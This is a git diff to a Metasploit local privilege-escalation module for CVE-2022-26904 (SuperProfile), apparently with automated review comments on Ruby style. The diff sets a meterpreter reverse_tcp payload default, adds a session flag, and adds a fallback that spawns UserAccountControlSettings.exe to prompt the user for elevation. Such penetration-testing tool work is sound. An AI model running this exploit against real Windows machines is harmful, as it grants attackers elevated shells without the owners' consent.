diff --git a/modules/exploits/windows/local/cve_2022_26904_superprofile.rb b/modules/exploits/windows/local/cve_2022_26904_superprofile.rb
index 2b2aa095e7..82bd24c75b 100644
--- a/modules/exploits/windows/local/cve_2022_26904_superprofile.rb
+++ b/modules/exploits/windows/local/cve_2022_26904_superprofile.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Local
 'DefaultOptions' => {
 'EXITFUNC' => 'thread',
 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
- 'WfsDelay' => 30
+ 'WfsDelay' => 300
 },
 'AKA' => [ 'SuperProfile' ]
 }
@@ -232,6 +232,7 @@ class MetasploitModule < Msf::Exploit::Local
 dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s
+ @session_obtained_bool = false
 # invoke the exploit, passing in the address of the payload that
 # we want invoked on successful exploitation, and the credentials for the second user.
 execute_dll(library_path, dll_info_parameter)
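Review bot: The new flag `@session_obtained_bool` carries a `_bool` suffix that Ruby convention drops for boolean instance variables, and the check added later in this commit spells it as `== false`; naming it `@session_obtained` and testing it with `unless @session_obtained` would read as idiomatic Ruby. Resetting it here, just before `execute_dll`, is the right place since, as far as this diff shows, `on_new_session` only ever sets it to true, but that ordering deserves a one-line comment such as `# cleared before execute_dll so on_new_session can record whether the primary payload called back`. The enclosing `exploit` method begins and ends outside this hunk.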
@@ -240,9 +241,23 @@ class MetasploitModule < Msf::Exploit::Local
 print_warning("Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:")
 print_warning('taskkill /IM "consent.exe" /F || taskkill /IM "narrator.exe" /F || taskkill /IM "narratorquickstart.exe" /F || taskkill /IM "msiexec.exe" || rmdir /q /s C:\Users\TEMP || rmdir /q /s C:\Windows\System32\Narrator.exe.local')
 print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')
+
+ print_status("Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.")
+ print_status("If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.")
+ sleep(60)
+ if (@session_obtained_bool == false)
+ # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself
+ # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.
+ begin
+ cmd_exec("UserAccountControlSettings.exe")
+ rescue Rex::TimeoutError
+ print_warning("Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!")
+ end
+ end
 end
 def on_new_session(new_session)
+ @session_obtained_bool = true
 old_session = @session
 @session = new_session
 if new_session.type == 'meterpreter'
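Review bot: `sleep(60)` blocks the exploit thread for the full minute even after `on_new_session` has flipped `@session_obtained_bool`, and the status message then asks the operator to CTRL+C, which likely aborts the running exploit rather than letting it return cleanly; polling the flag instead, `60.times { break if @session_obtained_bool; sleep(1) }`, returns as soon as a session lands while keeping the fallback for the case where none does. The guard `if (@session_obtained_bool == false)` is more idiomatically `unless @session_obtained_bool`. If, as the warning text implies, `UserAccountControlSettings.exe` opens a dialog and does not return promptly, then `rescue Rex::TimeoutError` is the expected path rather than a failure, so the comment above `begin` should say so, and the case where `cmd_exec` returns without timing out (the process exited without a prompt) currently prints nothing; a `print_status` after the call would tell the operator the fallback ran but may not have raised a prompt. The 60-second wait is hard-coded while the related `WfsDelay` default is raised to 300 in the same commit, so presumably exposing it as a datastore option would keep the two tunable together. `exploit`'s body starts before this hunk and `on_new_session` continues past it.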